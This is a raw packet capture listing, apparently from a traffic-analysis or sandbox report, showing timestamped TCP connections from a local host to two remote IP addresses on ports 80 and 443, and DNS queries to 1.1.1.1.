                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100739956 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100786924 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100822926 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100835085 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100835085 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100858927 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100867033 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100924969 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.100933075 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104782104 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104816914 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104820967 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104820967 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104856968 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104892969 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104892969 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104893923 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104928970 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104964018 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104967117 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104967117 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.104996920 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105020046 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105031013 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105036020 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105066061 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105098963 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105102062 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105102062 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105135918 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105169058 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105169058 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105601072 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105653048 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105653048 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105693102 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105705023 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105705976 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105741024 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105741978 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105775118 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105783939 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105783939 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105813026 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105834007 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105842113 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105880022 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.105880022 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.186999083 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187048912 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187079906 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187114000 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187114954 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187167883 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187205076 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187213898 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187213898 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187239885 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187274933 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187294960 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187340975 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187340975 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187357903 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187393904 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187438011 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187443972 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187479019 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187480927 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187515974 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187536001 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187536001 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187550068 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187583923 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187596083 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187596083 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187621117 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187664986 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.187665939 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221175909 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221246958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221285105 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221366882 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221412897 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221425056 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221437931 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221477985 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221478939 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221478939 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221489906 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221501112 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221518040 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221530914 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221553087 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221554041 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221565008 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221577883 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221590996 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221595049 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.221595049 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226166964 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226191044 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226211071 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226222992 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226234913 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226250887 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226250887 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226253986 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226267099 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226274014 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226285934 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226290941 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226290941 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226314068 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226331949 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226423025 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226445913 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226459026 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226468086 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226475000 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226489067 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226504087 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226504087 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226542950 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273511887 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273570061 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273605108 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273622036 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273622036 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273638010 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273672104 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273680925 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273680925 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273706913 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273720980 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273741961 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273782969 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273787022 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273787022 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273817062 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273827076 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273850918 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273883104 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273885965 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273920059 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273930073 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273930073 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273958921 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273969889 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273997068 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.274022102 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.274043083 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307496071 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307559967 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307614088 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307621956 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307641983 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307657003 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307703018 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307703018 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307712078 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307763100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307806015 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307806015 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307817936 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307868958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307872057 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307924032 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307966948 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307966948 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307982922 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308013916 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308048010 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308056116 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308056116 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308101892 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308114052 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308173895 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308176994 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308249950 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308290958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308290958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308281898 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308346987 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308383942 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308413982 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308413982 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308415890 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308449984 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308465004 CET4970580192.168.2.5176.113.115.19
Jan 12, 2025 17:52:03.308465004 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308482885 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308517933 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308547020 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308546066 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308547020 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308579922 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308592081 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308592081 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308614016 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308651924 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308651924 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308653116 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308662891 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308696032 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308715105 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308715105 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308728933 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308762074 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308777094 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308777094 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308794975 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308824062 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308840036 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308840036 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308856964 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308872938 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.308891058 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308926105 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308959007 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.308991909 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309024096 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309056044 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309089899 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309122086 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309156895 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309190035 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309227943 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309238911 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309273958 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309305906 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309364080 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309397936 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309421062 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.309432030 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309463978 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309477091 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.309477091 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.309498072 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:03.309544086 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:03.309544086 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:52:05.803237915 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:05.803288937 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:05.803412914 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:05.804560900 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:05.804579020 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.451900005 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.451963902 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:06.455061913 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:06.455074072 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.457171917 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.503710985 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:06.504731894 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:06.547331095 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.933916092 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.933949947 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.934057951 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:06.934057951 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:06.934092999 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.934114933 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.934123039 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:06.934175014 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:07.019375086 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:07.019448996 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:07.019476891 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:07.019526958 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:07.019948959 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:07.019999981 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:07.027679920 CET  49706        443        192.168.2.5      104.102.49.254
Jan 12, 2025 17:52:07.027697086 CET  443          49706      104.102.49.254   192.168.2.5
Jan 12, 2025 17:52:08.105099916 CET  80           49705      176.113.115.19   192.168.2.5
Jan 12, 2025 17:52:08.105276108 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:53:50.975492001 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:53:51.285543919 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:53:51.892370939 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:53:53.097629070 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:53:55.503846884 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:54:00.316342115 CET  49705        80         192.168.2.5      176.113.115.19
Jan 12, 2025 17:54:09.925749063 CET  49705        80         192.168.2.5      176.113.115.19
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 12, 2025 17:52:01.004312038 CET  61613        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:01.018717051 CET  53           61613      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.685065031 CET  63165        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:05.696404934 CET  53           63165      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.700683117 CET  65028        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:05.710176945 CET  53           65028      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.714240074 CET  61207        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:05.723428965 CET  53           61207      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.725641966 CET  65437        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:05.734882116 CET  53           65437      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.736407995 CET  55144        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:05.745599031 CET  53           55144      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.746938944 CET  59972        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:05.753963947 CET  53           59972      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.755306959 CET  52066        53         192.168.2.5      1.1.1.1
